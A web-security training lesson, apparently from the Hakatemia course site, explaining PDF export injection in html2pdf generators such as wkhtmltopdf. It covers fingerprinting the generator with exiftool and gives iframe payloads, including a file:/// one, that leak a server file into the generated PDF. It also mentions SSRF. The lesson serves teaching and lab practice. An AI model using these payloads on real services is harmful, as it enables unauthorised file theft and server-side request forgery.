What are html2pdf generators?
Each of us has probably seen, when a web service offers the possibility to print a page or information, after which the browser downloads a PDF file to the computer. Creating this PDF file usually happens using some tool or programming library, which is used to build the document in question.
Some tools and programming libraries enable the construction of a PDF file using HTML code. This type of PDF generator can be called an html2pdf generator, as it takes HTML code as input and generates a PDF file from it. One such tool is wkhtmltopdf.
The tool accepts HTML code, executes the code using a browser engine (essentially opening the page invisibly with something like Google Chrome browser) and then generates a PDF file from the executed HTML code. However, this poses a danger.
What are PDF export injections?
What happens if an attacker is able to manipulate or control the HTML code entered into the browser used by the PDF generator?
In the worst case scenario, the attacker is able to read the server's own files or perform arbitrary Server-Side Request Forgery attacks. This is because the server executes the given HTML code on the server side, allowing the code to access, for example, the server's own files.
PDF-export injection is discussed when an attacker is able to manipulate the HTML code used by the PDF generator and thus execute their own HTML code in the browser engine used by the generator.
At this point, we exploit the vulnerability present in the exercise target, so you can start the task below and repeat the steps at your own pace.
Investigation of the PDF generator
We start the vulnerability search by first determining how the target to be tested operates. We quickly notice that the system accepts HTML files and can then "export" PDF files from them.
Usually, when approaching a system with a "black-box" method, meaning there are no source codes available from the system, it can be difficult to understand what a particular functionality actually does. In such a case, where the system produces PDF files for us, it is however sometimes possible to determine how it used to convert this specific file, as sometimes these PDF generators (and also other tools) leave a trace of themselves in the file's metadata.
Reading metadata can be done, for example, with a tool called exiftool.
We pass a PDF file generated by a web application to a tool called exiftool. We can see the name and version of the PDF generator in the Creator attribute. Hint: in versions after 0.12.5 of wkhtmltopdf, local file reading is blocked, but SSRF is still possible.
This way, it is often possible to examine the logic behind the creation of various system-generated files. Sometimes applications also use outdated components for file conversion or manipulation.
It is important to note that not all PDF generators build PDF files from HTML code and that generators and their operation logic often vary greatly. For this reason, it is important to try to determine the component that is being used, after which you can find out from the documentation of that component how it works.
File leaking with file scheme and iframe element
Next, we will try using the iframe element in the HTML file and ensure that the website allows this usage in PDF generation.
<iframe width=400 height=400 src="https://www.example.com/"></iframe>
We generate a PDF file and look inside it.
Next, we will use the file:/// scheme. Unlike http and https, the file scheme refers to the computer's own file system, instead of a separate service. This is done in the following way.
<iframe width=400 height=400 src="file:///flag.txt"></iframe>
And when we generate a PDF file from this HTML file, we will see the content of the file. We have successfully leaked the server's own file through a vulnerable PDF generator.
Great! - You have completed the first PDF export injection lab. Try using other HTML elements in generation. Can you come up with other attack methods?
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.